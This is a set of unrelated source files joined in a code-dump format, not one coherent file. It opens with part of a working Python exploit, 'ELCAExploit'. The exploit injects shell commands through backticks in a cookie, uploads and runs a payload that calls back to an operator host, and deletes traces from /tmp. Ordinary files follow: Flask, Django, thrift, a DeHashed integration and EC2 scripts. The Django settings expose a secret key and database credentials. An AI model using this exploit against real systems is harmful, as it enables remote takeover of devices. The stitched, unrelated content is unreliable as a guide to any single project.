parser,subparsers = HTTPSExploit.add_args(cls)
egroup = parser.add_argument_group("%s Options" %
cls.name)
egroup.add_argument("--cid",type=str,help="Name of session ID in cookie (default: auto)")
return parser,subparsers
def touch(self,resp=None):
if not resp:
resp = self.head(self.target_url)
if 'etag' in resp.headers:
etag,date = self._parse_etag(resp.headers['etag'])
##
self.log.info("Etag - %s; Last modified - %s" % (etag,date))
def probe(self):
target = "/site/pages/index.html"
self.log.info("Checking current %s etag" % target)
old = self.get_etag(target)
##
sleep(1)
self.log.info("Running touch on %s" % target)
self._run_cmd("touch /w*/*/*/p*/*")
self.log.info("Checking etag again to confirm")
new = self.get_etag(target)
if new[0] == old[0]:
return "Unable to touch %s" % target
def exploit(self):
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._upload_run()
def clean(self):
''''''
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._run_cmd("rm -f /t*/.a")
self._run_cmd("rm -f /t*/.te*")
def build_nopen_exploit_payload(self):
##
cmd = "./htttpd %s D=-c%s tos_configd &" % ("./httpd",self.ns.callback)
self.build_exploit_payload(cmd)
def build_exploit_payload(self,cmd="/tmp/httpd"):
##
out = StringIO()
tf = tarfile.open(mode="w:gz",fileobj=out)
##
tf.dereference = True
try:
tf.add(self.tinyexec,arcname='htttpd')
tf.add(self.binpath,arcname='httpd')
tf.add(self.setlog,arcname='httppd')
##
except IOError, e:
self.log.error("Couldn't find file. Ensure paths are correct and you have run make.")
raise e
tf.close()
out.seek(0)
tdata = out.read()
self.folder = randstr(5)
stager = ""
for i,l in enumerate(open(self.stagerfn).readlines()):
if i == 0 or not l.strip().startswith("#"):
stager+=l
##
##
flen = len(stager.format(rand=self.folder,flen=len(stager),cmd=cmd))
self.payload = stager.format(rand=self.folder,flen=flen,cmd=cmd)
self.payload += tdata
def _get_cid(self):
''''''
if self.cid:
self.log.info("Already know cookie id: %s" % self.cid)
return self.cid
try:
cid = self.get(self.exploit_url).cookies.keys()[0]
self.log.info("Detected cookie id: %s" % cid)
return cid
except IndexError:
self.log.warning("Could not reliably detect cookie. Using 'session_id'...")
return "session_id"
def _upload_run(self):
self.log.info("Uploading and moving file...")
p = StringIO(self.payload)
if not self.cid:
self._get_cid()
self.post(self.exploit_url,cookies={self.cid:"x`cp /t*/cg* /tmp/.a`"},
files={randstr(5):p})
self.log.info("Making file executable...")
self._run_cmd("chmod +x /tmp/.a")
self.log.info("Running payload...")
try:
self._run_cmd("/tmp/.a",quiet=True)
except KeyboardInterrupt:
self.log.info("Closed manually by user. Exiting...")
except Timeout:
self.log.info("Connection timed out. Only a problem if the callback was not received.")
def _run_cmd(self,cmd,quiet=False,raw=False):
if quiet:
cmd = "%s 2>&1" % cmd
if not raw:
cmd = "x`%s`" % cmd
if len(cmd) > 24:
self.log.warning("Command is longer than 24 bytes: %s" % cmd)
self.continue_prompt("Are you sure you want to run this? (y/N) ")
if not self.cid:
self._get_cid()
self.log.debug("Running command on target: %s" % cmd)
return self.get(self.exploit_url,cookies={self.cid:cmd})
def _parse_etag(self,etag):
etag = etag.split("/")[-1].strip('"')
date = ctime(int(etag.split("-")[-1],16))
return etag,date
def main():
run_exploit(ELCAExploit)
if __name__=="__main__":
main()
| unlicense | 518,061,169,539,913,150 | 29.485549 | 99 | 0.546454 | false |
zaibacu/wutu | wutu/app.py | 1 | 1626 | import sys
import jinja2
from flask import Flask, render_template
from flask_restful import Api
from functools import lru_cache
from wutu.util import *
from wutu.compiler.common import create_base, create_stream, get_data
class CustomFlask(Flask):
"""
Enchanted Flask module
"""
jinja_options = Flask.jinja_options.copy()
jinja_options.update(dict(
variable_start_string='{<',
variable_end_string='>}',
))
def create(index="index.html", ngmodules=None, minify=True, locator=current):
"""
Creates wutu app
:param index: html file for index page
:param minify: Do we want to minify generated JavaScripts (should be False for debug purposes)
:param locator: function which tells where to find templates
:return:
"""
app = CustomFlask(__name__)
api = Api(app)
app.jinja_loader = jinja2.FileSystemLoader(locator())
api.jsstream = create_stream()
create_base(api.jsstream, ngmodules)
@app.route("/")
def index_page():
"""
Endpoint for base page
:return:
"""
try:
return render_template(index)
except IOError:
return "Failed to render template {0}, error: Not found".format(index)
@lru_cache()
@app.route("/wutu.js")
def wutu_js():
if minify:
from jsmin import jsmin
jsdata = jsmin(get_data(api.jsstream))
else:
from jsbeautifier import beautify
jsdata = beautify(get_data(api.jsstream))
return Response(jsdata, mimetype="text/javascript")
app.api = api
return app
| mit | 2,517,502,439,025,025,000 | 26.559322 | 98 | 0.630996 | false |
danielfbm/thrift-demo | tasks/newserver.py | 1 | 2910 | import thriftpy
tasks = thriftpy.load("tasks.thrift", module_name="tasks_thrift")
from thriftpy.rpc import make_server
from thriftpy.protocol import TJSONProtocolFactory
from db import TaskDB
import logging
logging.basicConfig()
from config import Config
class TaskHandler(object):
def all(self, userId):
print('getting all tasks for user: %s' % userId)
cursor = TaskDB.all(userId)
result = []
task = None
for t in cursor:
task = tasks.Task()
task.id = str(t['_id'])
task.name = t['name']
task.createdOn = t['createdOn'].isoformat()
task.userId = t['userId']
task.done = t['done']
result.append(task)
return result
def add(self, userId, name):
print('add(%s,%s)' % (userId, name))
instance = TaskDB.addOne(userId, name)
task = TaskHandler.convertInstance(instance)
return task
def update(self, id, name, done, userId):
print('update(%s, %s, %b, %s)' % (id, name, done, userId))
instance = TaskDB.updateOne(id, name, done, userId)
if (instance == None):
exception = tasks.BaseException()
exception.code = 404
exception.mesage = 'Task not found'
raise exception
task = TaskHandler.convertInstance(instance)
return task
def upsert(self, task):
print('upsert(%s)' % (task))
if (task is None):
exception = tasks.BaseException()
exception.code = 400
exception.message = 'Task data is invalid'
try:
if (task.id is not None):
instance = TaskDB.updateOne(task.id, task.userId, task.name, task.done)
else:
instance = TaskDB.addOne(task.userId, task.name)
except (Exception):
exception = tasks.BaseException()
exception.code = 400
exception.message = 'Unkown error'
raise exception
print(instance)
if (instance is None):
exception = tasks.BaseException()
exception.code = 404
exception.message = 'Task not found'
raise exception
task = TaskHandler.convertInstance(instance)
return task
@staticmethod
def convertInstance(instance):
task = tasks.Task()
task.id = str(instance['_id'])
task.userId = instance['userId']
task.name = instance['name']
task.createdOn = instance['createdOn'].isoformat()
task.done = instance['done']
return task
host = Config.getTaskServiceConfig()['host']
port = Config.getTaskServiceConfig()['port']
print('Server is running on %s port %d' % (host, port))
server = make_server(tasks.Tasks,
TaskHandler(),
host,
port)
server.serve()
| mit | 6,803,115,992,219,003,000 | 28.693878 | 87 | 0.571478 | false |
zhangyage/Python-oldboy | day11/day11_Django/day11_Django/settings.py | 1 | 2738 | # -*- coding:utf-8 -*-
"""
Django settings for day11_Django project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'f4#sx65y-0@=d4js9qnq#0b-wnh-r$w2xsf^*ek9@@1*%lzk()'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
#指定一下我们的模板文件的存放路径 注意那个,必须有的
TEMPLATE_DIRS = (
os.path.join(BASE_DIR,'template'),
)
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'web',
#这里需要我们配置我们的app
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
#注释掉上面的一行可以解决我们使用Django的跨站请求伪造问题
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'day11_Django.urls'
WSGI_APPLICATION = 'day11_Django.wsgi.application'
#连接mysql驱动配置
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'day11',
'USER':'zhangyage',
'PASSWORD':'zhangyage',
'HOST':'192.168.75.133',
'PORT':'3306',
}
}
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
#配置静态文件存放的路径
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR,'static'),
)
| apache-2.0 | -3,399,185,197,010,899,500 | 22.925926 | 71 | 0.68808 | false |
demisto/content | Packs/DeHashed/Integrations/DeHashed/DeHashed.py | 1 | 11742 | from typing import Union, Dict, Optional, List
from CommonServerPython import * # noqa: E402 lgtm [py/polluting-import]
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
INTEGRATION_CONTEXT_BRAND = "DeHashed"
BASE_URL = "https://api.dehashed.com/"
RESULTS_FROM = 1
RESULTS_TO = 50
class Client(BaseClient):
def __init__(
self,
base_url,
verify=True,
proxy=False,
ok_codes=None,
headers=None,
auth=None,
email=None,
api_key=None,
email_dbot_score='SUSPICIOUS'
):
super().__init__(
base_url,
verify=verify,
proxy=proxy,
ok_codes=ok_codes,
headers=headers,
auth=auth,
)
self.email = email
self.api_key = api_key
self.email_dbot_score = email_dbot_score
def dehashed_search(self, asset_type: Optional[str], value: List[str], operation: Optional[str],
results_page_number: Optional[int] = None) -> dict:
"""
this function gets query parameters from demisto and perform a "GET" request to Dehashed api
:param asset_type: email, ip_address, username, hashed_password, name, vin, address, phone,all_fields.
:param value: value to search
:param operation: choose a search type to perform.
:param results_page_number: a page number to get. every page contains 5,000 entries.
:return: a dictionary containing: a list of entries that match the query, number of total results exits for the
given query, request status, how much time the request took, and balance.
"""
if not value:
raise DemistoException('This command must get "value" as argument')
query_value = ""
if len(value) > 1:
if operation == "is":
query_value = " ".join((f'"{value}"' for value in value))
elif operation == "contains":
query_value = " OR ".join(value)
query_value = f"({query_value})"
elif operation == "regex":
query_value = " ".join((f"/{value}/" for value in value))
else:
if operation == "is":
query_value = f'"{value[0]}"'
elif operation == "contains":
query_value = value[0]
elif operation == 'regex':
query_value = f"/{value[0]}/"
if asset_type == "all_fields":
query_string = f"{query_value}"
else:
query_string = f"{asset_type}:{query_value}"
if results_page_number:
return self._http_request(
"GET",
"search",
params={"query": query_string, "page": results_page_number},
auth=(self.email, self.api_key),
timeout=25,
)
else:
return self._http_request(
"GET",
"search",
params={"query": query_string},
auth=(self.email, self.api_key),
timeout=25
)
def test_module(client: Client) -> str:
"""
Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful.
Args:
client: DeHashed client
Returns:
'ok' if test passed, anything else will fail the test.
"""
result = client.dehashed_search(
asset_type="vin", value=["test", "test1"], operation="is"
)
if isinstance(result, dict):
return "ok"
else:
return f"Test failed because got unexpected response from api: {result}"
def validate_filter_parameters(results_from_value, results_to_value):
if results_to_value <= 0:
raise DemistoException(f'Argument "results_to" expected to be greater than zero, but given:'
f' {results_to_value}')
elif results_from_value <= 0:
raise DemistoException(f'Argument "results_from" expected to be greater than zero, but given:'
f' {results_from_value}')
elif results_to_value > results_from_value:
raise DemistoException('Argument "results_to" expected to be less than or equal to "results_from"')
def filter_results(
entries: list, results_from: Union[int, None], results_to: Union[int, None]
) -> tuple:
"""
gets raw results returned from the api and limit the number of entries to return to demisto
:param entries: search results of the performed query
:param results_from: start range
:param results_to: end range
:return: filtered results
"""
if not results_from:
results_from = RESULTS_FROM
if not results_to:
results_to = RESULTS_TO
if results_to > len(entries):
results_to = len(entries)
validate_filter_parameters(results_to, results_from)
return entries[results_from - 1:results_to], results_from, results_to
def arg_to_int(arg_val: Optional[str], arg_name: Optional[str]) -> Optional[int]:
"""
converts commands arguments to integers
:param arg_name: argument name
:param arg_val: value to convert to int
:return: converted argument as int
"""
if arg_val is None:
return None
if not isinstance(arg_val, str):
return None
try:
result = int(arg_val)
if result <= 0:
raise DemistoException(f'"{arg_name}" expected to be greater than zero.')
return result
except ValueError:
raise DemistoException(
f'"{arg_name}" expected to be Integer. passed {arg_val} instead.'
)
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': dbot_score
}
def dehashed_search_command(client: Client, args: Dict[str, str]) -> tuple:
"""
this command returns data regarding a compromised assets given as arguments
:param client: Demisto client
:param args:
- asset_type: email, ip_address, username, hashed_password, name, vin, address, phone,all_fields.
- value: value to search
- operation: choose a search type to perform.
- results_page_number: a page number to get. every page contains 5,000 entries.
- results_from: sets result's start range
- results_to: sets result's end range
:return: Demisto outputs
"""
asset_type = args.get("asset_type")
operation = args.get("operation")
value = argToList(args.get("value"))
results_page_number = arg_to_int(args.get("page"), "page")
results_from = arg_to_int(args.get("results_from"), "results_from")
results_to = arg_to_int(args.get("results_to"), "results_to")
result = client.dehashed_search(asset_type, value, operation, results_page_number)
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
return "No matching results found", None, None
else:
filtered_results, results_from, results_to = filter_results(
query_data, results_from, results_to
)
query_entries = createContext(
filtered_results, keyTransform=underscoreToCamelCase
)
headers = [key.replace("_", " ") for key in [*filtered_results[0].keys()]]
if not results_page_number:
results_page_number = 1
last_query = {
"ResultsFrom": results_from,
"ResultsTo": results_to,
"DisplayedResults": len(filtered_results),
"TotalResults": result.get("total"),
"PageNumber": results_page_number
}
return (
tableToMarkdown(
f'DeHashed Search - got total results: {result.get("total")}, page number: {results_page_number}'
f', page size is: {len(filtered_results)}. returning results from {results_from} to {results_to}.',
filtered_results,
headers=headers,
headerTransform=pascalToSpace,
),
{
f"{INTEGRATION_CONTEXT_BRAND}.LastQuery(true)": last_query,
f"{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)": query_entries,
},
filtered_results,
)
def email_command(client: Client, args: Dict[str, str]) -> tuple:
"""
This command returns data regarding a compromised email address
:param client: Demisto client
:param args:
- email: the email address that should be checked
:return: Demisto outputs
"""
email_address = argToList(args.get('email'))
result = client.dehashed_search('email', email_address, 'contains')
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
context = {
'DBotScore':
{
'Indicator': email_address[0],
'Type': 'email',
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': 0
}
}
return "No matching results found", context, None
else:
default_dbot_score_email = 2 if client.email_dbot_score == 'SUSPICIOUS' else 3
query_entries = createContext(query_data, keyTransform=underscoreToCamelCase)
sources = [entry.get('obtained_from') for entry in query_data if entry.get('obtained_from')]
headers = [key.replace("_", " ") for key in [*query_data[0].keys()]]
hr = tableToMarkdown(f'DeHashed Search - got total results: {result.get("total")}', query_data, headers=headers,
headerTransform=pascalToSpace)
dbot_score = default_dbot_score_email if len(sources) > 0 else 0
context = {
f'{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)': query_entries,
'DBotScore': create_dbot_score_dictionary(email_address[0], 'email', dbot_score)
}
return hr, context, query_data
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
email = demisto.params().get("credentials", {}).get('identifier', '')
api_key = demisto.params().get("credentials", {}).get('password', '')
base_url = BASE_URL
verify_certificate = not demisto.params().get("insecure", False)
proxy = demisto.params().get("proxy", False)
email_dbot_score = demisto.params().get('email_dbot_score', 'SUSPICIOUS')
LOG(f"Command being called is {demisto.command()}")
try:
client = Client(
base_url,
verify=verify_certificate,
email=email,
api_key=api_key,
proxy=proxy,
headers={"accept": "application/json"},
email_dbot_score=email_dbot_score
)
if demisto.command() == "test-module":
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif demisto.command() == "dehashed-search":
return_outputs(*dehashed_search_command(client, demisto.args()))
elif demisto.command() == "email":
return_outputs(*email_command(client, demisto.args()))
else:
return_error('Command not found.')
# Log exceptions
except Exception as e:
return_error(f"Failed to execute {demisto.command()} command. Error: {str(e)}")
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
| mit | -7,711,274,168,360,616,000 | 35.69375 | 120 | 0.590785 | false |
dacb/viscount | tests/utils.py | 1 | 5572 | """
utilities for unit testing
authorization header decoging and batteries included flask test
case mixin class
"""
import base64
import hmac
from datetime import datetime, timedelta
from hashlib import sha1
import simplejson as json
from werkzeug.utils import parse_cookie
def get_auth_headers(username=None, password=None):
username = username or 'username'
password = password or 'password'
encoded = base64.b64encode('%s:%s' % (username, password))
return {'Authorization': 'Basic ' + encoded}
class FlaskTestCaseMixin(object):
def _create_csrf_token(self):
csrf_key = 'csrf_token'
with self.client.session_transaction() as session:
session['csrf'] = csrf_key
secret_key = self.app.config['SECRET_KEY']
expires = (datetime.now() + timedelta(minutes=30)).strftime('%Y%m%d%H%M%S')
csrf_build = '%s%s' % (csrf_key, expires)
csrf_token = csrf_build.encode('utf8')
csrf_hmac = hmac.new(secret_key, csrf_token, digestmod=sha1)
self.csrf_token = '%s##%s' % (expires, csrf_hmac.hexdigest())
def _html_data(self, kwargs):
if 'data' in kwargs:
kwargs['data']['csrf_token'] = self.csrf_token
if not kwargs.get('content_type'):
kwargs['content_type'] = 'application/x-www-form-urlencoded'
return kwargs
def _json_data(self, kwargs, csrf_enabled=True):
if 'data' in kwargs:
kwargs['data']['csrf_token'] = self.csrf_token
kwargs['data'] = json.dumps(kwargs['data'])
if not kwargs.get('content_type'):
kwargs['content_type'] = 'application/json'
return kwargs
def _request(self, method, *args, **kwargs):
kwargs.setdefault('content_type', 'text/html')
kwargs.setdefault('follow_redirects', True)
return method(*args, **kwargs)
def _jrequest(self, *args, **kwargs):
return self._request(*args, **kwargs)
def get(self, *args, **kwargs):
return self._request(self.client.get, *args, **kwargs)
def post(self, *args, **kwargs):
return self._request(self.client.post, *args, **self._html_data(kwargs))
def put(self, *args, **kwargs):
return self._request(self.client.put, *args, **self._html_data(kwargs))
def delete(self, *args, **kwargs):
return self._request(self.client.delete, *args, **kwargs)
def jget(self, *args, **kwargs):
return self._jrequest(self.client.get, *args, **kwargs)
def jpost(self, *args, **kwargs):
return self._jrequest(self.client.post, *args, **self._json_data(kwargs))
def jput(self, *args, **kwargs):
return self._jrequest(self.client.put, *args, **self._json_data(kwargs))
def jdelete(self, *args, **kwargs):
return self._jrequest(self.client.delete, *args, **kwargs)
def getCookies(self, response):
cookies = {}
for value in response.headers.get_all("Set-Cookie"):
cookies.update(parse_cookie(value))
return cookies
def assertStatusCode(self, response, status_code):
"""Assert the status code of a Flask test client response
:param response: The test client response object
:param status_code: The expected status code
"""
self.assertEquals(status_code, response.status_code)
return response
def assertOk(self, response):
"""Test that response status code is 200
:param response: The test client response object
"""
return self.assertStatusCode(response, 200)
def assertBadRequest(self, response):
"""Test that response status code is 400
:param response: The test client response object
"""
return self.assertStatusCode(response, 400)
def assertForbidden(self, response):
"""Test that response status code is 403
:param response: The test client response object
"""
return self.assertStatusCode(response, 403)
def assertNotFound(self, response):
"""Test that response status code is 404
:param response: The test client response object
"""
return self.assertStatusCode(response, 404)
def assertContentType(self, response, content_type):
"""Assert the content-type of a Flask test client response
:param response: The test client response object
:param content_type: The expected content type
"""
self.assertEquals(content_type, response.headers['Content-Type'])
return response
def assertOkHtml(self, response):
"""Assert the response status code is 200 and an HTML response
:param response: The test client response object
"""
return self.assertOk(
self.assertContentType(response, 'text/html; charset=utf-8'))
def assertJson(self, response):
"""Test that content returned is in JSON format
:param response: The test client response object
"""
return self.assertContentType(response, 'application/json')
def assertOkJson(self, response):
"""Assert the response status code is 200 and a JSON response
:param response: The test client response object
"""
return self.assertOk(self.assertJson(response))
def assertBadJson(self, response):
"""Assert the response status code is 400 and a JSON response
:param response: The test client response object
"""
return self.assertBadRequest(self.assertJson(response))
def assertCookie(self, response, name):
"""Assert the response contains a cookie with the specified name
:param response: The test client response object
:param key: The cookie name
:param value: The value of the cookie
"""
self.assertIn(name, self.getCookies(response))
def assertCookieEquals(self, response, name, value):
"""Assert the response contains a cookie with the specified value
:param response: The test client response object
:param name: The cookie name
:param value: The value of the cookie
"""
self.assertEquals(value, self.getCookies(response).get(name, None))
| bsd-2-clause | 521,881,412,278,953,400 | 29.282609 | 77 | 0.71949 | false |
kumkee/SURF2016 | src/marketdata/globalpricematrix.py | 1 | 3459 | from coinlist import CoinList
import pandas as pd
from time import time
from time import sleep
import numpy as np
NOW = 0
FIVE_MINUTES = 60*5
FIFTEEN_MINUTES = FIVE_MINUTES * 3
HALF_HOUR = FIFTEEN_MINUTES * 2
HOUR = HALF_HOUR * 2
TWO_HOUR = HOUR * 2
FOUR_HOUR = HOUR * 4
DAY = HOUR * 24
YEAR = DAY * 365
CSV_DEFAULT = 'pm.csv'
COIN_REF = 'LTC'
class GlobalPriceMatrix(CoinList):
def __init__(self, start = DAY, end = NOW, period = HALF_HOUR, csv = None, coin_filter = 0.2):
if not csv:
super(GlobalPriceMatrix, self).__init__()
self._coin_filter = coin_filter
if csv:
self.__getPriceFromFile(csv)
else:
self.__getPriceFromExchange(start, end, period)
def __getPriceFromExchange(self, start, end, period):
t = time()
self._start = t - start
self._end = t - end + 10*period
self._period = period
self.__coinFilter()
self.__checkperiod()
coin = COIN_REF
chart = self.getChart(coin, start = self._start, end = self._end)
cols = [d['date'] for d in chart]
self._pm = pd.DataFrame(index = self._coins, columns = cols).astype('float32')
self.__fillPriceRow(coin, start = self._start, end = self._end)
for c in self._coins:
if c == COIN_REF:
continue
self.__fillPriceRow(c, start = self._start, end = self._end)
def __fillPriceRow(self, coin, start, end):
chart = self.getChart(coin=coin, start=start, end=end)
for c in chart:
self._pm.at[coin, c['date']] = c['close']
@property
def pricedata(self):
return self._pm
@property
def pricematrix(self):
return self._pm.as_matrix()
def getChart(self, coin, start, end):
chart = self.polo.marketChart( \
pair = self.allActiveCoins.at[coin, 'pair'], \
start = start, \
end = end, \
period = self._period )
return chart
def __coinFilter(self):
if(self._coin_filter):
self._coins = self.topNVolume(
n = int(len(self.allActiveCoins) * self._coin_filter)).index
def to_csv(self, filepath = CSV_DEFAULT):
#Save the database into csv file
pm = self._pm.transpose()
pm.index = pd.to_datetime(pm.index, unit = 's')
pm.to_csv(filepath)
def __getPriceFromFile(self, csv = CSV_DEFAULT):
pm = pd.DataFrame.from_csv(csv).astype('float32')
pm.index = pm.index.astype(np.int64)/10**9
self._pm = pm.transpose()
self._start = self._pm.columns[0]
self._end = self._pm.columns[-1]
self._period = self._pm.columns[1] - self._start
def __checkperiod(self):
if self._period == FIVE_MINUTES:
return
elif self._period == FIFTEEN_MINUTES:
return
elif self._period == HALF_HOUR:
return
elif self._period == TWO_HOUR:
return
elif self._period == FOUR_HOUR:
return
elif self._period == DAY:
return
else:
raise ValueError('peroid has to be 5min, 15min, 30min, 2hr, 4hr, or a day')
FIVE_MINUTES = 60*5
FIFTEEN_MINUTES = FIVE_MINUTES * 3
HALF_HOUR = FIFTEEN_MINUTES * 2
#HOUR = HALF_HOUR * 2
TWO_HOUR = HALF_HOUR * 4
FOUR_HOUR = HALF_HOUR * 8
DAY = HALF_HOUR * 48
| gpl-3.0 | 28,672,610,416,348,292 | 27.121951 | 98 | 0.558832 | false |
jangorecki/h2o-3 | ec2/h2o-cluster-launch-instances.py | 1 | 4600 | #!/usr/bin/env python
import os
import sys
import time
import boto
import boto.ec2
# Environment variables you MUST set (either here or by passing them in).
# -----------------------------------------------------------------------
#
os.environ['AWS_ACCESS_KEY_ID'] = ''
os.environ['AWS_SECRET_ACCESS_KEY'] = ''
os.environ['AWS_SSH_PRIVATE_KEY_FILE'] = ''
# Launch EC2 instances with an IAM role
# --------------------------------------
#
iam_profile_resource_name = None
# or
iam_profile_name = None
# Options you MUST tailor to your own AWS account.
# ------------------------------------------------
# SSH key pair name.
keyName = ''
# AWS security group name.
# Note:
# H2O uses TCP and UDP ports 54321 and 54322.
# RStudio uses TCP port 8787.
securityGroupName = 'SecurityDisabled'
# Options you might want to change.
# ---------------------------------
numInstancesToLaunch = 2
instanceType = 'm3.2xlarge'
instanceNameRoot = 'h2o-instance'
# Options to help debugging.
# --------------------------
debug = 0
# debug = 1
dryRun = False
# dryRun = True
# Options you should not change unless you really mean to.
# --------------------------------------------------------
regionName = 'us-east-1'
amiId = 'ami-0b100e61'
#regionName = 'us-west-1'
#amiID = 'ami-c1afd6a1'
#--------------------------------------------------------------------------
# No need to change anything below here.
#--------------------------------------------------------------------------
# Note: this python script was initially developed with boto 2.13.3.
def botoVersionMismatch():
print 'WARNING: Unsupported boto version. Please upgrade boto to at least 2.13.x and try again.'
print 'Comment this out to run anyway.'
print 'Exiting.'
sys.exit(1)
if not 'AWS_ACCESS_KEY_ID' in os.environ:
print 'ERROR: You must set AWS_ACCESS_KEY_ID in the environment.'
sys.exit(1)
if not 'AWS_SECRET_ACCESS_KEY' in os.environ:
print 'ERROR: You must set AWS_SECRET_ACCESS_KEY in the environment.'
sys.exit(1)
if not 'AWS_SSH_PRIVATE_KEY_FILE' in os.environ:
print 'ERROR: You must set AWS_SSH_PRIVATE_KEY_FILE in the environment.'
sys.exit(1)
publicFileName = 'nodes-public'
privateFileName = 'nodes-private'
if not dryRun:
fpublic = open(publicFileName, 'w')
fprivate = open(privateFileName, 'w')
print 'Using boto version', boto.Version
if True:
botoVersionArr = boto.Version.split(".")
if (botoVersionArr[0] != 2):
botoVersionMismatch
if (botoVersionArr[1] < 13):
botoVersionMismatch
if (debug):
boto.set_stream_logger('h2o-ec2')
ec2 = boto.ec2.connect_to_region(regionName, debug=debug)
print 'Launching', numInstancesToLaunch, 'instances.'
reservation = ec2.run_instances(
image_id=amiId,
min_count=numInstancesToLaunch,
max_count=numInstancesToLaunch,
key_name=keyName,
instance_type=instanceType,
security_groups=[securityGroupName],
instance_profile_arn=iam_profile_resource_name,
instance_profile_name=iam_profile_name,
dry_run=dryRun
)
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
print 'Waiting for instance', i+1, 'of', numInstancesToLaunch, '...'
instance.update()
while instance.state != 'running':
print ' .'
time.sleep(1)
instance.update()
print ' instance', i+1, 'of', numInstancesToLaunch, 'is up.'
name = instanceNameRoot + str(i)
instance.add_tag('Name', value=name)
print
print 'Creating output files: ', publicFileName, privateFileName
print
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
instanceName = ''
if 'Name' in instance.tags:
instanceName = instance.tags['Name'];
print 'Instance', i+1, 'of', numInstancesToLaunch
print ' Name: ', instanceName
print ' PUBLIC: ', instance.public_dns_name
print ' PRIVATE:', instance.private_ip_address
print
fpublic.write(instance.public_dns_name + '\n')
fprivate.write(instance.private_ip_address + '\n')
fpublic.close()
fprivate.close()
print 'Sleeping for 60 seconds for ssh to be available...'
time.sleep(60)
d = os.path.dirname(os.path.realpath(__file__))
print 'Testing ssh access...'
cmd = d + '/' + 'h2o-cluster-test-ssh.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
print
print 'Distributing flatfile...'
cmd = d + '/' + 'h2o-cluster-distribute-flatfile.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
# Distribute flatfile script already prints success when it completes.
| apache-2.0 | 4,029,750,662,069,026,000 | 25.900585 | 102 | 0.622391 | false |
oksome/Tumulus | tumulus/tag.py | 1 | 1267 | # -*- coding: utf-8 -*-
# This file is part of Tumulus.
#
# Copyright (C) 2013 OKso (http://okso.me)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
See reference: http://www.javascriptkit.com/domref/elementproperties.shtml
'''
from .element import Element, EmptyElement
class Tag(object):
def __init__(self, tagname, element=Element):
self.tagname = tagname
self.element = element
def __call__(self, *inner, **kwargs):
return self.element(self.tagname, components=inner, attributes=kwargs)
class EmptyTag(Tag):
def __call__(self, *inner, **kwargs):
return EmptyElement(self.tagname, attributes=kwargs)
| agpl-3.0 | 2,938,885,543,379,877,000 | 30.675 | 78 | 0.713496 | false |
ned14/tnfox | Python/aliases.py | 1 | 1055 | #! /usr/bin/python
# Copyright 2004 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
db = {
"QPtrVector<FX::FXWindow>" : "QPtrVectorOfFXWindow"
, "QMemArray<unsigned char>" : "QMemArrayOfUnsignedChar"
, "QValueList<FX::Pol::knowReferrers::ReferrerEntry>" : "QValueListOfReferrerEntry"
, "FXIPCMsgChunkCodeAlloc<0,false>" : "FXIPCMsgChunkCodeAlloc0False"
